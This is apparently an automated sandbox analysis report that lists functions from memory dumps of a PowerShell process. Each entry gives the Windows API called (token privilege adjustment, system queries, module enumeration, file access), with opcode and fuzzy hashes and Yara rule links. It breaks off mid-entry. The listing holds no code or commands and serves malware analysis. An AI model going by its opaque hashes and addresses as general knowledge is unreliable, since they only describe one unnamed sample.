                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01E0A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: fd017e338ac0bc66b7433508e4096a353f9874caca5347c068ebe9a2507e7554
                                                        • Instruction ID: 77cba75c974e3ea9f478b3322e349e6268adec6ddd57b34adb69484dc580efaf
                                                        • Opcode Fuzzy Hash: fd017e338ac0bc66b7433508e4096a353f9874caca5347c068ebe9a2507e7554
                                                        • Instruction Fuzzy Hash: C301F775600744CFEB11DF55DC857A9FBA4DF44320F08C4BBDC098B282D279A484CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E023F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158782735.0000000001E02000.00000040.00000001.sdmp, Offset: 01E02000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea9feb2e377e364d719c00f6331ffd48a7bae67dd445f29848423e273ac8abb6
                                                        • Instruction ID: ba6b1bd7f6790e3f3416baddcd08854d7f2b8fe15425ce8b888d9f5789ef502e
                                                        • Opcode Fuzzy Hash: ea9feb2e377e364d719c00f6331ffd48a7bae67dd445f29848423e273ac8abb6
                                                        • Instruction Fuzzy Hash: 38D05E79205A828FE7178A1CC1A8B993BE4AF55B08F4744F9E940CB6A3C768E5C1E200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E023BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158782735.0000000001E02000.00000040.00000001.sdmp, Offset: 01E02000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb212121e7d94b2a364eca4ecbf418ecab797a254d396a0a904d22b6c6b55cf6
                                                        • Instruction ID: 0d316eb15bfdbc07057b7520b0db95119a0d7d178c62d4d33b458cd63b9af312
                                                        • Opcode Fuzzy Hash: fb212121e7d94b2a364eca4ecbf418ecab797a254d396a0a904d22b6c6b55cf6
                                                        • Instruction Fuzzy Hash: E4D05E343006828FEB16CA1CD598F5D77E8AF40704F0644E8FD408B2A6C3B8E8C0C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 2488 Parent PID: 2612 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01F4ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F4AD37
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 571bd51d99336b22d0141838c977e700d33a1dbe35133b335c016a1342077284
                                                        • Instruction ID: 2f38b7f38e6f196f8b98ffa5e3a9a59892f9acbfd682948ba8f882c3e8c7c30f
                                                        • Opcode Fuzzy Hash: 571bd51d99336b22d0141838c977e700d33a1dbe35133b335c016a1342077284
                                                        • Instruction Fuzzy Hash: 7821BC765097809FEB238F25DC44B92BFB4EF06210F08849AE9858F563D271A908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F4AD37
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 9c881e9871f02474068eae38ca55a94f278bd132d6677ab005f764d1863fbd02
                                                        • Instruction ID: 84ea74163afa4e4ac900710a8b37e9cc8dbda726be8c218951748d2747dd5e15
                                                        • Opcode Fuzzy Hash: 9c881e9871f02474068eae38ca55a94f278bd132d6677ab005f764d1863fbd02
                                                        • Instruction Fuzzy Hash: DB115E76500744DFEB21CF55D884B96FFE4EF04221F08C46AED8A8B662D372E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F4B329
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: f4ba73bd0ef9114bb8a51900f6cf71a11b3298d0ca2aeed2b6e9edb07118b9e9
                                                        • Instruction ID: f6d2ba2a6946c3d1c10a6fcc0141b9157b0a9c4508cd69f2db19ee26ccabd0e7
                                                        • Opcode Fuzzy Hash: f4ba73bd0ef9114bb8a51900f6cf71a11b3298d0ca2aeed2b6e9edb07118b9e9
                                                        • Instruction Fuzzy Hash: 7211A371508380DFD7228F15DC45F62FFB4EF06214F09849AED844B553C276A418DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F4B329
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: f8cce0e648a008e1b4bdc54132efa097c3fcc86c398eedba543ffe35adf92072
                                                        • Instruction ID: 9165db46b0a46cfffe3c61083f5be12759ee1e0e94e695382aeae4de98147949
                                                        • Opcode Fuzzy Hash: f8cce0e648a008e1b4bdc54132efa097c3fcc86c398eedba543ffe35adf92072
                                                        • Instruction Fuzzy Hash: 1F01AD32800740DFEB219F0AD885B66FFA0FF08720F08C49ADD494B612C276E418DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 321a09a06014b5992271add2a5cd672699ba9f6d4c5b18658d1f951c91525cb2
                                                        • Instruction ID: f3f06eb0019022be30f9830df60a0a940f9a5c681c8883fc87808835c513bc3a
                                                        • Opcode Fuzzy Hash: 321a09a06014b5992271add2a5cd672699ba9f6d4c5b18658d1f951c91525cb2
                                                        • Instruction Fuzzy Hash: D631687650E3C48FE7138B759C65692BFB4AF03210F0E84DBD984CF1A3D6299809DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 7fcb984283f25efafaabe66f9096adc1ad6100ef27a7d3b89e4c9b49bea3d3bf
                                                        • Instruction ID: 9efdd8d016a6da70768daa93694cee9f186c0dd117f08862425d197e6609c93c
                                                        • Opcode Fuzzy Hash: 7fcb984283f25efafaabe66f9096adc1ad6100ef27a7d3b89e4c9b49bea3d3bf
                                                        • Instruction Fuzzy Hash: A1317075505384AFE722CF65CC85F56BFF8EF05210F09849EE988CB292D365A808CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 06a285ea2d5c9cb46ec755ca159de82f6ddfac03aa6520bbb7da5be2047498a5
                                                        • Instruction ID: ff045fd825f3c4732a8956fd0816a1477a2c8236e80d1b730337d59617b97c38
                                                        • Opcode Fuzzy Hash: 06a285ea2d5c9cb46ec755ca159de82f6ddfac03aa6520bbb7da5be2047498a5
                                                        • Instruction Fuzzy Hash: DE31EA75509384AFE712CB25CC45B96BFE8DF06214F0444AAE948CF293D775A909C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: da893afde620b42d992404d107457954f5202ef46f64c88652b9d431ffdc2dc5
                                                        • Instruction ID: 9b8876790bc27f9961d3e3ffdd754631b9f99f5b95e3aebc473726359a9ac875
                                                        • Opcode Fuzzy Hash: da893afde620b42d992404d107457954f5202ef46f64c88652b9d431ffdc2dc5
                                                        • Instruction Fuzzy Hash: D221E6B2509380AFE712CF64DC45B96BFB8EF06320F0884DBE985DB193C2659945C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 36b5f6bc79f6ccfc9f0ca6116e0fcdd2cde9bcf48017fec240b94cd58469bb39
                                                        • Instruction ID: efc6e64bf0f985b652875e22dfdf4d2ad9ccc0a80fe08270dd2095fc42c7a830
                                                        • Opcode Fuzzy Hash: 36b5f6bc79f6ccfc9f0ca6116e0fcdd2cde9bcf48017fec240b94cd58469bb39
                                                        • Instruction Fuzzy Hash: 8B318172509380AFE722CB61DC55F96BFB8EF06210F08859BE985DB193D225A909C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 4c7b0f7ed90f467d56e8928d2a87ef467e42dbbb305a7e9d8dfa7bf97eada9e2
                                                        • Instruction ID: d988cd6196e7251f4b50825a41ee16f63bfce43e5b1aac20727480de51ff99c1
                                                        • Opcode Fuzzy Hash: 4c7b0f7ed90f467d56e8928d2a87ef467e42dbbb305a7e9d8dfa7bf97eada9e2
                                                        • Instruction Fuzzy Hash: 8D31917550E3C0AFD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D229A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 51aaf4c2cb9d3a2f0df4cfc654e54cee7febba294122e31b7cd757f8eb20cbc7
                                                        • Instruction ID: b517dd18f1f67c045dc3d7dd4b0c0fd24a7f8284ca4349b556af4e5f26b99704
                                                        • Opcode Fuzzy Hash: 51aaf4c2cb9d3a2f0df4cfc654e54cee7febba294122e31b7cd757f8eb20cbc7
                                                        • Instruction Fuzzy Hash: E8219471509380EFE722CB15CC45FA6BFB8EF06210F08849AE949DB152D665E908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F4A23E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 90f66c9413fd8c2bdf7b341d13f122e6d6e5bd1739f482c89a89627fa136751d
                                                        • Instruction ID: c66ed661e860b1c2e352b7fa414cde9a04248f684162a92cb9785cfdc3a2c78a
                                                        • Opcode Fuzzy Hash: 90f66c9413fd8c2bdf7b341d13f122e6d6e5bd1739f482c89a89627fa136751d
                                                        • Instruction Fuzzy Hash: 3D21C97140D3C09FD312CB258C55B65BFB4EF47610F0981DBD844CF193D229A919CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 02840819
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: b9373dd93c7d3f3c18abc56d3b1b351d73e2f3118a83aa4de6f128a25da23b96
                                                        • Instruction ID: 3204c79a3ba1260d68cb3874b2036b09b0567c79a5ef5bf383e87ac77bdbcc3f
                                                        • Opcode Fuzzy Hash: b9373dd93c7d3f3c18abc56d3b1b351d73e2f3118a83aa4de6f128a25da23b96
                                                        • Instruction Fuzzy Hash: 0A210A76408784AFE712CB159C45FA3BFA8EF46720F0881DBF9888F193D224A905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 01ed31ffaa69293483891e51d5df24e2d2124403fdd495604a69885ab98b1bfd
                                                        • Instruction ID: 7ccf9f28c777279d0ba4f235738cc9a6caace132243c4bb47422b42fc5e2d90a
                                                        • Opcode Fuzzy Hash: 01ed31ffaa69293483891e51d5df24e2d2124403fdd495604a69885ab98b1bfd
                                                        • Instruction Fuzzy Hash: 0E217F7540E3C0AFD3128B358C55B66BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028406AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 41038023d74dec3e65fc593277ea275db6d127b62f9585751ff27abe56431b4c
                                                        • Instruction ID: e83467292b9f34dd1920eb18b8f52d7cbc52bc2caef75a696369384fa7e53bc2
                                                        • Opcode Fuzzy Hash: 41038023d74dec3e65fc593277ea275db6d127b62f9585751ff27abe56431b4c
                                                        • Instruction Fuzzy Hash: FF21A175500304EFE720DF65CC85F66FBE8EF08250F04846AEA49CB292D772E804CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 028408E5
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 10b2cbbad7a542dedb84aa90e25937f5d3b2dbb8d1ba656800bf0f03e00fefd5
                                                        • Instruction ID: 5cf5803120adea677521b7619b044fc012019981cc7c3dee4ff56280a872f2f4
                                                        • Opcode Fuzzy Hash: 10b2cbbad7a542dedb84aa90e25937f5d3b2dbb8d1ba656800bf0f03e00fefd5
                                                        • Instruction Fuzzy Hash: 3821B275409380AFE722CF50DC45F96FFB8EF06314F09849BE9488B153C265A909CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01F4A94A
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: ff789952c2aa0be4cd5a6e01d57691e48791723c59874e250255a9f12be7fe9d
                                                        • Instruction ID: ed098f11be48a83d515b1d66278d62d66b4add504215bd4212148e6c731477c7
                                                        • Opcode Fuzzy Hash: ff789952c2aa0be4cd5a6e01d57691e48791723c59874e250255a9f12be7fe9d
                                                        • Instruction Fuzzy Hash: DE21A77540D780AFD3138B25DC51B62BFB4EF87710F0981DBE8848B653D225A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 2a055c34a3410ca7f9f0302e35f18767e9767f2fcf21de3cd75b96791e91bc02
                                                        • Instruction ID: 8d5ed3f9d113873bdec475c00be066742d68c653087e5c3af9d8518f8bd3cea4
                                                        • Opcode Fuzzy Hash: 2a055c34a3410ca7f9f0302e35f18767e9767f2fcf21de3cd75b96791e91bc02
                                                        • Instruction Fuzzy Hash: BA21AE75600208EFF724DF25DC85BA7FBE8EF08254F04856AE948DB282D775F904CA62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: cd3aebf5d3bb8af27dfe35c9891e346a919bd18831fa2ad5000879f224221e7e
                                                        • Instruction ID: d35c3d6c83225c5bfe3e2805c975dd784e31e7cd5af185d71fe122895f3b334e
                                                        • Opcode Fuzzy Hash: cd3aebf5d3bb8af27dfe35c9891e346a919bd18831fa2ad5000879f224221e7e
                                                        • Instruction Fuzzy Hash: 4E119D72500304EFEB21DF55DC85FAAFBACEF04320F04856AF949DA142D671E9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: b7f6d58515a008c4fa45eb7fcc99bf325491e74b23e65e2ea2df708ced2b183a
                                                        • Instruction ID: e17582894ba0face91579380df0d1b68d04f2f71d40b68d41c68eddba89e9558
                                                        • Opcode Fuzzy Hash: b7f6d58515a008c4fa45eb7fcc99bf325491e74b23e65e2ea2df708ced2b183a
                                                        • Instruction Fuzzy Hash: 7B118172604300EFEB21DF19DC85FAAFBE8EF04661F14846AED09CB642D675E904CA71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02840F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 44b47bc92661190e71c6d5255b66c13cab5537ecf666b928a1d42457accf295b
                                                        • Instruction ID: 652d98944ad66b40676a9a7cd33ac83c1191dedbe5ed19950967738c98c72670
                                                        • Opcode Fuzzy Hash: 44b47bc92661190e71c6d5255b66c13cab5537ecf666b928a1d42457accf295b
                                                        • Instruction Fuzzy Hash: 8B219F7550D3C49FDB12CB25CC55B92BFB4AF13214F0C84EAD988CF693D2699408CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0284137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 5cec0e181d657d0a86fc01d4f19506eb5dafc4c4b146dc4f9927563e3b507850
                                                        • Instruction ID: 471bf5e410de9444483dd921e07473b279525b23c460e9b58a9a2b770b299fac
                                                        • Opcode Fuzzy Hash: 5cec0e181d657d0a86fc01d4f19506eb5dafc4c4b146dc4f9927563e3b507850
                                                        • Instruction Fuzzy Hash: 52219F765083809FEB21CF25DC45B96FFF4EF06220F0884AAED898B562D235A448DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: 96a52c9f6c33cd00c4c02641a6c91732fa37f160c5356bfc20911bc7f765418a
                                                        • Instruction ID: 5a6aec8c155a0f249a3f9a4a68cb73f8a555be78a79a385f93d158d76e6db589
                                                        • Opcode Fuzzy Hash: 96a52c9f6c33cd00c4c02641a6c91732fa37f160c5356bfc20911bc7f765418a
                                                        • Instruction Fuzzy Hash: 3121A4715093C09FDB128B25DC55A92BFF4EF07210F0D84DBDD858F263D2659908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F4AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 8acc1182e7ff09a71c69d7c559580606cee6961e5de628917ef81afa9481be36
                                                        • Instruction ID: 1682ea57c29f5f335453183345d4efa673df3ef144c0b808dd9bd1320c1474d9
                                                        • Opcode Fuzzy Hash: 8acc1182e7ff09a71c69d7c559580606cee6961e5de628917ef81afa9481be36
                                                        • Instruction Fuzzy Hash: CB2172716053809FE722CF29DC44B52BFE8EF46214F0884AAED49CB253D265E404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028410D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2166521816.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: ad828738f218bc17c4bb2b2c00d4f2b3aebd9babe3ab16fff4d4105e8b7c51c4
                                                        • Instruction ID: a7e1da20e7f12b85740e054280df8d41ebdfe142e2b0d338a448cf38ac30453c
                                                        • Opcode Fuzzy Hash: ad828738f218bc17c4bb2b2c00d4f2b3aebd9babe3ab16fff4d4105e8b7c51c4
                                                        • Instruction Fuzzy Hash: 05216D6540D3C49FD7138B259C54A62BFB4EF57620F0980DBD8898F2A3D6696808D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8AA3FD8C,00000000,00000000,00000000,00000000), ref: 01F4AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 0c27dee6728f13cf72948c439e0087702fb1567f4185b8491738e602bdb86539
                                                        • Instruction ID: 23af60149fd61a8f66e7d86a078a324e57ebb41c17173ff0d5d151a7d8f11b8b
                                                        • Opcode Fuzzy Hash: 0c27dee6728f13cf72948c439e0087702fb1567f4185b8491738e602bdb86539
                                                        • Instruction Fuzzy Hash: 6111C472500300EFEB21DF55DC45BA6FBE8EF44720F14846AED09CB181D671A904CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F4BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F4BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 5b50e6d994d812fb90f429ccacffd1aa705e16a6296db62a990a0c8b2907a210
                                                        • Instruction ID: fa8d39cfa2a41071414eab504986402e81eb4893d0abcf69c3597170c9adb8a6
